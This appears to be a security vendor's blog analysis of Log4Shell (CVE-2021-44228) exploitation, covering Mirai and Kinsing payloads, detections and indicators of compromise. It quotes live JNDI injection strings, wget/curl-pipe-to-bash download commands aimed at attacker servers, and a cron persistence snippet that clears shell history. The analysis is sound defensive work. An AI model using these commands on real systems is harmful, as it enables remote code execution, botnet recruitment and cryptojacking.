Zscaler Threatlabz team has been actively monitoring the exploit attempts related to the Apache log4j 0-day Remote Code Execution Vulnerability (CVE-2021-44228) also known as “Log4Shell”. In this blog we will share our analysis of the exploit payloads being delivered using this vulnerability. We will continue to update this blog and share more details as we uncover them during our analysis.
The Threatlabz team had also published a Security Advisory related to this vulnerability.
What is causing this vulnerability?
There is a flaw in the Log4j utility (version 2.0 to 2.15) where an attacker can control log message parameters to execute arbitrary code loaded from various JNDI endpoints such as LDAP, LDAPS, RMI, DNS, etc.
Log4j Exploit chain
The attacker sends maliciously crafted HTTP requests to the web application server running the vulnerable Log4j utility. Once the request is received Log4j tries to load the JNDI resource from an attacker controlled server and depending upon the type of protocol used, loads additional components. These components can include a shell script or a java class that can write a file to disk or memory and executes the final payload.
We have observed multiple botnets including Mirai and Kinsing (cryptomining) leveraging this log4j exploit to target vulnerable servers on the Internet… In addition to Mirai and Kinsing families, we have also seen reports of CobaltStrike and ransomware related activity from these exploits.
Exploit Commands Observed
${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCBodHRwOi8vNjIuMjEwLjEzMC4yNTAvbGguc2g7...
> wget http://62.210.130[.]250/lh.sh;chmod +x lh.sh;./lh.sh
${jndi:ldap://45.137.21.9:1389/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMj...
> wget -q -O- http://62.210.130[.]250/lh.sh|bash
${jndi:ldap://92.242.40.21:5557/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3...
> (curl -s 92.242.40[.]21/lh.sh||wget -q -O- 92.242.40[.]21/lh.sh)
Threat actors also appear to be leveraging network fingerprinting technique before serving stage 2 payloads.
The injected command will include victim server IP/Port information that will be checked before serving malicious payloads as seen below.
${jndi:ldap://45.155.205.233:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1Lj…
> (curl -s 45.155.205[.]233:5874/<VICTIME-IP:PORT>||wget -q -O- 45.155.205[.]233:5874/<VICTIME-IP:PORT>)|bash
Payload analysis
#1 Mirai Botnet
Shell Script lh.sh (MD5: cf2ce888781958e929be430de173a0f8) is downloaded from 62.210.130[.]250 (attacker server). This bash script when executed will further download multiple linux binary payloads on the victim machine. The script also sets execute permission for the downloaded payloads and runs them.
wget http://62.210.130[.]250/web/admin/x86;chmod +x x86;./x86 x86;
wget http://62.210.130[.]250/web/admin/x86_g;chmod +x x86_g;./x86_g x86_g;
wget http://62.210.130[.]250/web/admin/x86_64;chmod +x x86_64;./x86_g x86_64;
All of these binaries belong to the Mirai botnet family and share the same code structure. They are compiled for different architectures - x86 32-bit, 64-bit. There is no code to check the architecture, instead the attacker intends to run all binaries hoping one of them will be successful.
These Mirai binaries were configured to communicate with C2 domain nazi[.]uy on port 25565 and are capable of supporting following commands from the Attacker:
UDP flood
SYN flood
ACK flood
TCP stomp flood
GRE IP flood
Connect flood
#2 Kinsing Malware
Shell Script lh2.sh (MD5: 0579a8907f34236b754b07331685d79e) is downloaded from 92.242.40[.]21/lh2.sh it belongs to the Kinsing malware family which essentially is a coinminer with rootkit capabilities.
The stage 1 bash script (lh2.sh) will stop and disable multiple security processes on the victim server before downloading the Kinsing binary. This is to ensure that the malicious payload is not detected and blocked from execution.
Kinsing is a Golang based coin miner as shown below:
92.242.40.21_kinsing: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), statically linked, Go BuildID=DhskS7dCbYzdqxBh_mSk/76qVIoHRKN1NNcfL8ADh/W157t201-UbEisb9Xatk/hOMqvN1a69kKMwHq_e_v, stripped
The bash script will also establish persistence by adding a cronjob that will periodically download and execute updated versions of the bash script from a remote location.
Persistence
if [ $? -eq 0 ]; then
echo "cron good"
else
(
crontab -l 2>/dev/null
echo "* * * * * $LDR http://185.191.32[.]198/lh.sh | sh > /dev/null 2>&1"
) | crontab -
fi
history -c
rm -rf ~/.bash_history
history -c
Here, $LDR value is derived from the victim environment and can either be “wget -q -O -” or “curl”
185.191.32[.]198/lh.sh downloads and executes the latest Kinsing binary but from 80.71.158[.]12/kinsing
More updates to follow.
Zscaler Detections
ThreatName
DetectionID
Type Of Detection
Apache.Exploit.CVE-2021-44228
47673
IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228
47674
IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228
47675
IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228
47676
IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228
47677
IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228
47707
IPS Web - URL
Apache.Exploit.CVE-2021-44228
47708
IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228
47711
IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228
47801
IPS Web - User-Agent
Apache.Exploit.CVE-2021-44228
124803
File-Content (Yara)
Apache.Exploit.CVE-2021-44228
-
FIle Reputation
Linux.Trojan.Mirai
-
File Reputation
Linux.Trojan.Mirai.LZ
-
URL Reputation
Linux.Rootkit.Kinsing
-
File Reputation
Linux.Rootkit.Kinsing.LZ
-
URL Reputation
Indicators Of Compromise
Mirai Samples
40e3b969906c1a3315e821a8461216bb
6d275af23910c5a31b2d9684bbb9c6f3
1348a00488a5b3097681b6463321d84c
Mirai C2
nazi[.]uy
Mirai Download URLs
62.210.130[.]250/web/admin/x86
62.210.130[.]250/web/admin/x86_g
62.210.130[.]250/web/admin/x86_64
Kinsing Samples
648effa354b3cbaad87b45f48d59c616
Kinsing Shell Scripts
92.242.40[.]21/lh2.sh
80.71.158[.]12.lh.sh
Kinsing Download URLs
92.242.40[.]21/kinsing
80.71.158[.]12/kinsing
Persistence
185.191.32[.]198/lh.sh
Top Exploit Server IPs
37.233.99[.]127:1389
45.137.21[.]9:1389
45.155.205[.]233:12344
45.155.205[.]233:5874
45.137.21[.]9:1389
92.242.40[.]21:5557
References
https://www.cisa.gov/uscert/ncas/current-activity/2021/12/10/apache-releases-log4j-version-2150-address-critical-rce
https://www.trendmicro.com/en_us/research/20/k/analysis-of-kinsing-malwares-use-of-rootkit.html
https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/
Article Link: Threatlabz analysis - Log4shell CVE-2021-44228 exploit attempts | Zscaler